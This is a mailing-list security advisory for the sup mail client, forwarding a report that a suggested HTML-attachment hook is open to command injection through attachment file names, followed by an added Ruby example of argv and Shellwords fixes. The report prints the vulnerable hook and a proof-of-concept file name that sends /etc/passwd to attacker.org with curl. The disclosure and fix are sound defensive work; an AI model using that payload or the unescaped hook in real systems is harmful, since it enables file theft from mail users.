Greetings suppers,

joernchen has pointed out to me that our suggested hook for viewing HTML attachments has a serious security issue. The updated suggestion in [0] (wiki) should be safer.

Please make sure that you update your mime-decode hook!

Best regards,
Gaute

[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments

--- Begin forwarded message from joernchen ---

From: joernchen <...>
To: eg <e...@gaute.vetsj.com>
Date: Sat, 17 Aug 2013 14:14:29 +0200
Subject: Security issue with suggested configuration of sup

[...]

At [0] the suggested configuration for viewing HTML attachments with sup using the mime-decode hook is given as follows:

    unless sibling_types.member? "text/plain"
      case content_type
      when "text/html"
        `/usr/bin/w3m -dump -T #{content_type} '#{filename}'`
      end
    end

This piece of code however is prone to command injection via the file name of the attached file. The command injection triggers upon sup indexing the mail, so no user interaction is needed. A better approach would be the following:

    require 'shellwords'

    unless sibling_types.member? "text/plain"
      case content_type
      when "text/html"
        `/usr/bin/w3m -dump -T #{content_type} #{Shellwords.escape filename}`
      end
    end

[...]

A simple PoC would be sending an email with a file attachment named like:

    '$(cd .. && cd .. && cd .. && cd .. && cd etc && curl --data @passwd attacker.org)'.html

to a sup user making use of the suggested decode hook.

[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments

[...]

_______________________________________________
Sup-devel mailing list
Sup-devel@rubyforge.org
http://rubyforge.org/mailman/listinfo/sup-devel
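The following is an added, stand-alone example illustrating the fix discussed in the thread; it is not sup's code, not the wiki hook, and not part of the mailing-list messages above. It takes the hook's `filename` and `content_type` as plain parameters, keeps the `/usr/bin/w3m -dump -T` invocation from the page as the default renderer, and shows two ways to keep an attachment name out of the shell's hands: running the renderer with an argv array (no shell at all) and, where the backtick style is kept, building the command line with `Shellwords.join` so every interpolated argument is escaped. The renderer lambda, the `cat` stand-in used so the example runs without w3m, and the temp-file fixture with a `$(echo injected).html` name are all constructed for this example.

```ruby
require 'shellwords'
require 'tmpdir'

# Added example (not sup's code and not part of the mailing-list thread):
# two ways to pass an attachment's file name to an external renderer without
# letting the shell interpret it. The renderer is a lambda that builds the
# argv prefix from the content type; the default mirrors the w3m invocation
# from the wiki hook, and the demo/test swap in ["cat"] so it runs anywhere.
W3M_RENDERER = ->(content_type) { ["/usr/bin/w3m", "-dump", "-T", content_type] }

# Option 1: skip the shell entirely. IO.popen with an argv array execs the
# program directly, so "$(...)", backticks and quotes in the name are inert.
def render_attachment_no_shell(filename, content_type, renderer: W3M_RENDERER)
  IO.popen(renderer.call(content_type) + [filename], "r") { |io| io.read }
end

# Option 2: keep the backtick style of the hook, but build the command line
# with Shellwords.join so every argument (content type included, since it
# also comes from the mail) is escaped before the shell sees it.
def shell_command_line(filename, content_type, renderer: W3M_RENDERER)
  Shellwords.join(renderer.call(content_type) + [filename])
end

def render_attachment_escaped(filename, content_type, renderer: W3M_RENDERER)
  `#{shell_command_line(filename, content_type, renderer: renderer)}`
end

# Constructed fixture: an attachment whose name carries a harmless command
# substitution, written to a temp dir so the renderer has a real file to read.
HOSTILE_NAME = "$(echo injected).html"

def with_hostile_attachment
  Dir.mktmpdir do |dir|
    path = File.join(dir, HOSTILE_NAME)
    File.write(path, "<p>hello</p>\n")
    yield path
  end
end

if __FILE__ == $PROGRAM_NAME
  cat = ->(_content_type) { ["cat"] }   # stand-in renderer, no w3m needed
  with_hostile_attachment do |path|
    puts "escaped command line: #{shell_command_line(path, 'text/html', renderer: cat)}"
    puts "no-shell output:      #{render_attachment_no_shell(path, 'text/html', renderer: cat).inspect}"
    puts "escaped output:       #{render_attachment_escaped(path, 'text/html', renderer: cat).inspect}"
  end
end
```

Of the two, the argv-array form is the simpler guarantee: there is no shell parsing step, so there is nothing to escape. The escaped form matters when a hook must stay a single shell string, and the point of using `Shellwords.join` over a hand-placed `Shellwords.escape` is that it covers every argument uniformly rather than only the one you remembered.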